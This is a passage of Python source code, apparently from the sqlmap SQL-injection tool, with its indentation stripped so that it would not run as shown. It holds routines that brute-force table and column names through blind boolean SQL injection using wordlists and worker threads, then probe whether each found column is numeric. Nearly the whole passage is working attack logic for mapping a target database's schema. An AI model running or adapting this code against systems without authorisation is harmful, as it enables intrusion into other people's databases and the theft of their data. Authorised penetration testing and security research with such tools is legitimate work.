unique=True)
infoMsg = "checking table existence using items from '%s'" % tableFile
logger.info(infoMsg)
tables.extend(_addPageTextWords())
tables = filterListValue(tables, regex)
threadData = getCurrentThreadData()
threadData.shared.count = 0
threadData.shared.limit = len(tables)
threadData.shared.value = []
threadData.shared.unique = set()
def tableExistsThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
kb.locks.count.acquire()
if threadData.shared.count < threadData.shared.limit:
table = safeSQLIdentificatorNaming(
tables[threadData.shared.count], True)
threadData.shared.count += 1
kb.locks.count.release()
else:
kb.locks.count.release()
break
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms(
) not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
fullTableName = "%s%s%s" % (
conf.db, '..' if Backend.getIdentifiedDbms() in
(DBMS.MSSQL, DBMS.SYBASE) else '.', table)
else:
fullTableName = table
result = inject.checkBooleanExpression(
"%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE,
(randomInt(1), fullTableName)))
kb.locks.io.acquire()
if result and table.lower() not in threadData.shared.unique:
threadData.shared.value.append(table)
threadData.shared.unique.add(table.lower())
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
clearConsoleLine(True)
infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime(
"%X"), unsafeSQLIdentificatorNaming(table))
dataToStdout(infoMsg, True)
if conf.verbose in (1, 2):
status = '%d/%d items (%d%%)' % (
threadData.shared.count, threadData.shared.limit,
round(100.0 * threadData.shared.count /
threadData.shared.limit))
dataToStdout(
"\r[%s] [INFO] tried %s" % (time.strftime("%X"), status),
True)
kb.locks.io.release()
try:
runThreads(conf.threads, tableExistsThread, threadChoice=True)
except KeyboardInterrupt:
warnMsg = "user aborted during table existence "
warnMsg += "check. sqlmap will display partial output"
logger.warn(warnMsg)
clearConsoleLine(True)
dataToStdout("\n")
if not threadData.shared.value:
warnMsg = "no table(s) found"
logger.warn(warnMsg)
else:
for item in threadData.shared.value:
if conf.db not in kb.data.cachedTables:
kb.data.cachedTables[conf.db] = [item]
else:
kb.data.cachedTables[conf.db].append(item)
for _ in ((conf.db, item) for item in threadData.shared.value):
if _ not in kb.brute.tables:
kb.brute.tables.append(_)
hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True)
return kb.data.cachedTables
def columnExists(columnFile, regex=None):
if not conf.tbl:
errMsg = "missing table parameter"
raise SqlmapMissingMandatoryOptionException(errMsg)
if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
conf.db = conf.db.upper()
result = inject.checkBooleanExpression(
safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE,
(randomStr(), randomStr())))
if result:
errMsg = "can't use column existence check because of detected invalid results "
errMsg += "(most probably caused by inability of the used injection "
errMsg += "to distinguish errornous results)"
raise SqlmapDataException(errMsg)
infoMsg = "checking column existence using items from '%s'" % columnFile
logger.info(infoMsg)
columns = getFileItems(columnFile, unique=True)
columns.extend(_addPageTextWords())
columns = filterListValue(columns, regex)
table = safeSQLIdentificatorNaming(conf.tbl, True)
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms(
) not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table)
kb.threadContinue = True
kb.bruteMode = True
threadData = getCurrentThreadData()
threadData.shared.count = 0
threadData.shared.limit = len(columns)
threadData.shared.value = []
def columnExistsThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
kb.locks.count.acquire()
if threadData.shared.count < threadData.shared.limit:
column = safeSQLIdentificatorNaming(
columns[threadData.shared.count])
threadData.shared.count += 1
kb.locks.count.release()
else:
kb.locks.count.release()
break
result = inject.checkBooleanExpression(
safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE,
(column, table)))
kb.locks.io.acquire()
if result:
threadData.shared.value.append(column)
if conf.verbose in (1, 2) and not hasattr(conf, "api"):
clearConsoleLine(True)
infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime(
"%X"), unsafeSQLIdentificatorNaming(column))
dataToStdout(infoMsg, True)
if conf.verbose in (1, 2):
status = '%d/%d items (%d%%)' % (
threadData.shared.count, threadData.shared.limit,
round(100.0 * threadData.shared.count /
threadData.shared.limit))
dataToStdout(
"\r[%s] [INFO] tried %s" % (time.strftime("%X"), status),
True)
kb.locks.io.release()
try:
runThreads(conf.threads, columnExistsThread, threadChoice=True)
except KeyboardInterrupt:
warnMsg = "user aborted during column existence "
warnMsg += "check. sqlmap will display partial output"
logger.warn(warnMsg)
clearConsoleLine(True)
dataToStdout("\n")
if not threadData.shared.value:
warnMsg = "no column(s) found"
logger.warn(warnMsg)
else:
columns = {}
for column in threadData.shared.value:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, ):
result = not inject.checkBooleanExpression(
"%s" % safeStringFormat(
"EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')",
(column, table, column)))
else:
result = inject.checkBooleanExpression("%s" % safeStringFormat(
"EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))",
(column, table, column, column)))
if result:
columns[column] = 'numeric'
else:
columns[column] = 'non-numeric'
kb.data.cachedColumns[conf.db] = {conf.tbl: columns}
for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]),
columns.items()):
if _ not in kb.brute.columns:
kb.brute.columns.append(_)
hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True)
return kb.data.cachedColumns
